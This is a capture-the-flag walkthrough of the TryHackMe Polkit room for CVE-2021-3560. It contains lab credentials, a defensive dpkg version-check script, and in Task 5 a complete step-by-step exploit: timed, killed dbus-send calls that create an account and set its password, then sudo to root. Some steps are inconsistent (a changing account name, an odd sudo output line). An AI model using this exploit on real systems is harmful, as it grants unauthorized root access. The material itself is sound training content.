TryHackMe: Polkit: CVE-2021-3560 Walkthrough
You can access the room through this link: https://tryhackme.com/room/polkit
Task 1 (Info): Deploy
Click the green “Start Machine” button to deploy the machine! → No answer needed.
Task 2 (Info): Important! About Dynamic Flags
What is the URL of the website you should submit dynamic flags to? → https://flag.muir.land/
Task 3 (Tutorial): Background
Read the background material in this task carefully; it explains how polkit authorization works and why the race condition exists.
In what version of Ubuntu's policykit-1 is CVE-2021-3560 patched? → 0.105-26ubuntu1.1
What program can we use to run commands as other users via polkit? → pkexec
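A quick defender-side check that goes with the Task 3 answer, added here as an example (not part of the room): it implements dpkg's version-ordering rules so an installed policykit-1 version can be compared against the patched build the room names, 0.105-26ubuntu1.1. The version strings in the test are constructed; the module itself assumes only the standard library.

```python
# Added example, not part of the TryHackMe room: report whether an installed
# Ubuntu policykit-1 build predates the patched version the room names in
# Task 3 (0.105-26ubuntu1.1), using dpkg's version-ordering rules.
import re

PATCHED_VERSION = "0.105-26ubuntu1.1"  # from the room's Task 3 answer

def _order(c):
    """dpkg weight of a non-digit char: '~' < end-of-string (0) < letters < others."""
    if c == "~":
        return -1
    return ord(c) if c.isalpha() else ord(c) + 256

def _cmp_fragment(a, b):
    """Compare upstream or revision strings as dpkg does: alternate a non-digit
    run (per-character weights) with a digit run (numeric value)."""
    while a or b:
        i, j = re.match(r"\D*", a).end(), re.match(r"\D*", b).end()
        for x, y in zip(a[:i], b[:j]):
            if _order(x) != _order(y):
                return _order(x) - _order(y)
        if i != j:  # longer run: its next char is weighed against end-of-string
            return _order(a[j]) if i > j else -_order(b[i])
        a, b = a[i:], b[j:]
        i, j = re.match(r"\d*", a).end(), re.match(r"\d*", b).end()
        if int(a[:i] or 0) != int(b[:j] or 0):
            return int(a[:i] or 0) - int(b[:j] or 0)
        a, b = a[i:], b[j:]
    return 0

def _split(version):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision)."""
    epoch, sep, rest = version.partition(":")
    if not sep:
        epoch, rest = "0", version
    upstream, sep, revision = rest.rpartition("-")
    return int(epoch), (upstream if sep else rest), (revision if sep else "")

def compare_versions(v1, v2):
    """Negative, zero or positive, like dpkg --compare-versions v1 lt/eq/gt v2."""
    e1, u1, r1 = _split(v1)
    e2, u2, r2 = _split(v2)
    return (e1 - e2) or _cmp_fragment(u1, u2) or _cmp_fragment(r1, r2)

def is_unpatched(installed):
    """True when the installed policykit-1 version is older than PATCHED_VERSION."""
    return compare_versions(installed, PATCHED_VERSION) < 0
```

On a Debian or Ubuntu host the installed version to feed into is_unpatched comes from `dpkg-query -W -f='${Version}' policykit-1`.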
Task 4 (Tutorial): Exploitation Process
Read through the exploitation process described in this task before moving on. → No answer needed
Task 5 (Practical): Do it for yourself!
If you would like to SSH into the target machine, the credentials are:
• Username: tryhackme
• Password: TryHackMe123!
First, let’s look at the dbus messages we’ll need to send:
tryhackme@polkit:~$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:yoyohoney string:"Honey Singh" int32:1
We need a password hash here, so let's generate a sha512crypt hash for our chosen password (Expl01ted):
tryhackme@polkit:~$ openssl passwd -6 Expl01ted
$6$gtjmG63Uxa5SIVIA$RXtnqUAbCWLjjLgPAW0hrJ8J4DN1OAUcr5dwB7ABI3CvKpibN.pN.x1JZG1LIhKWQXaaVonnyDHVM7bjcx/0f.
Our second dbus message will set a password for the new account:
tryhackme@polkit:~$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$gtjmG63Uxa5SIVIA$RXtnqUAbCWLjjLgPAW0hrJ8J4DN1OAUcr5dwB7ABI3CvKpibN.pN.x1JZG1LIhKWQXaaVonnyDHVM7bjcx/0f.' string:'Ask the pentester'
We need to send the dbus message, then kill the sending process about halfway through:
tryhackme@polkit:~$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1 & sleep 0.005s; kill $!
Now let’s finish this! 5 milliseconds worked last time, so it should work here too:
tryhackme@polkit:~$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$gtjmG63Uxa5SIVIA$RXtnqUAbCWLjjLgPAW0hrJ8J4DN1OAUcr5dwB7ABI3CvKpibN.pN.x1JZG1LIhKWQXaaVonnyDHVM7bjcx/0f.' string:'Ask the pentester' & sleep 0.005s; kill $!
tryhackme@polkit:~$ su attacker
Password:Expl01ted
attacker@polkit:/home/tryhackme$ sudo -l
[sudo] password for attacker:Expl01ted
-S, --stdin                   read password from standard input
attacker@polkit:/home/tryhackme$ sudo -s
root@polkit:/home/tryhackme# whoami
root
root@polkit:/home/tryhackme# cat /root/root.txt
Bijaa2pyBVg=-4w64kzT+bxfUR+c9-s7RE1MbSF8bh4QMI/PFNvB7P00ADqjGV88dskBFvRN/pDzE6rDDlvg==
We got the flag, but it is far too long to be the real one: this room uses dynamic flags. We now have to submit it at https://flag.muir.land/ (the site from Task 2).
You will be asked to submit three pieces of information:
- Your username. It is very important that this is identical to your TryHackMe username!
- The box code. In most instances this will be the same as the room code. For this room the code will be: polkit
- The flag
The site then returns the real flag to submit in the room.
Note: always terminate the machine you deployed in this room when you are done.
Thanks for reading; I hope you liked it. Post your questions in the comment section below!